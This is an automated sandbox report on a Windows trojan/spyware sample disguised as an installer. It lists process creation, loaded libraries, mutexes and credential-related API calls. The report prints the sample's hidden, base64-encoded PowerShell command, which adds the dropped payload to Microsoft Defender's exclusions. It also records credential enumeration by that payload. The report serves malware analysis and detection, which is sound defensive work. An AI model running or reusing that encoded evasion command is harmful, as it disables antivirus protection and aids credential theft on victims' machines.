                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB9E3208_2_00000218BFB9E320
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBBD2A08_2_00000218BFBBD2A0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBBC3008_2_00000218BFBBC300
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB802E08_2_00000218BFB802E0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFC0E2CC8_2_00000218BFC0E2CC
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBC82308_2_00000218BFBC8230
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB8A1F08_2_00000218BFB8A1F0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBC01F08_2_00000218BFBC01F0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBC51E08_2_00000218BFBC51E0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB861308_2_00000218BFB86130
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB9E1308_2_00000218BFB9E130
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB561808_2_00000218BFB56180
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBE50448_2_00000218BFBE5044
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBBF0408_2_00000218BFBBF040
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB890908_2_00000218BFB89090
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBE70608_2_00000218BFBE7060
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBBCF708_2_00000218BFBBCF70
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA107FD08_2_00007FF7AA107FD0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA1339D08_2_00007FF7AA1339D0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA105AB08_2_00007FF7AA105AB0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA10BAC08_2_00007FF7AA10BAC0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA11AF508_2_00007FF7AA11AF50
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA115F608_2_00007FF7AA115F60
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA119F708_2_00007FF7AA119F70
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA1060308_2_00007FF7AA106030
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA106D408_2_00007FF7AA106D40
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA11DD608_2_00007FF7AA11DD60
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA113EC78_2_00007FF7AA113EC7
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA11C2968_2_00007FF7AA11C296
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA11B4808_2_00007FF7AA11B480
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA1195108_2_00007FF7AA119510
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA1051408_2_00007FF7AA105140
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA1071808_2_00007FF7AA107180
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA10C1B08_2_00007FF7AA10C1B0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA12A1E88_2_00007FF7AA12A1E8
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA11E1F28_2_00007FF7AA11E1F2
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA10B2208_2_00007FF7AA10B220
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA1122908_2_00007FF7AA112290
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA1192D08_2_00007FF7AA1192D0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA11E2E08_2_00007FF7AA11E2E0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA11D8908_2_00007FF7AA11D890
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA1136188_2_00007FF7AA113618
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA10E6F08_2_00007FF7AA10E6F0
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exe 69F8CEA7A5B6E5DE711E9849F4BC0244F1344966364520BC12987F1B90013754
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: String function: 00000218BFB7B930 appears 32 times
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: String function: 00007FF7AA1067A0 appears 52 times
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: String function: 00000218BFB84C00 appears 41 times
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: String function: 00000218BFB95330 appears 70 times
                Source: 9RM52QaURq.exe, 00000000.00000000.1687654261.00000000007A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameInstaller_sharp.exe@ vs 9RM52QaURq.exe
                Source: 9RM52QaURq.exe, 00000000.00000002.2126855628.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 9RM52QaURq.exe
                Source: 9RM52QaURq.exeBinary or memory string: OriginalFilenameInstaller_sharp.exe@ vs 9RM52QaURq.exe
                Source: classification engineClassification label: mal93.troj.spyw.evad.winEXE@7/7@1/3
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD5970 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,8_2_00000218BFBD5970
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFC22008 AdjustTokenPrivileges,CredEnumerateA,8_2_00000218BFC22008
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB8C8C0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,8_2_00000218BFB8C8C0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBBF1D0 CoCreateInstance,8_2_00000218BFBBF1D0
                Source: C:\Users\user\Desktop\9RM52QaURq.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9RM52QaURq.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeMutant created: \Sessions\1\BaseNamedObjects\Mmm-A33C734061CA11EE8C18806E6F6E6963E13D18B7
                Source: C:\Users\user\Desktop\9RM52QaURq.exeFile created: C:\Users\user\AppData\Local\Temp\38HsqwHlbGJump to behavior
                Source: 9RM52QaURq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 9RM52QaURq.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\9RM52QaURq.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 9RM52QaURq.exeReversingLabs: Detection: 18%
                Source: unknownProcess created: C:\Users\user\Desktop\9RM52QaURq.exe "C:\Users\user\Desktop\9RM52QaURq.exe"
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess created: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exe "C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exe"
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcAJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess created: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exe "C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exe" Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: uiautomationcore.dllJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: Next
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: Accept
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: Next
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: Accept
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: Next
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: Accept
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: Next
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: Accept
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: Next
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: Accept
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: Next
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: OK
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: Accept
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: Next
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: OK
                Source: C:\Users\user\Desktop\9RM52QaURq.exeAutomated click: Accept
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
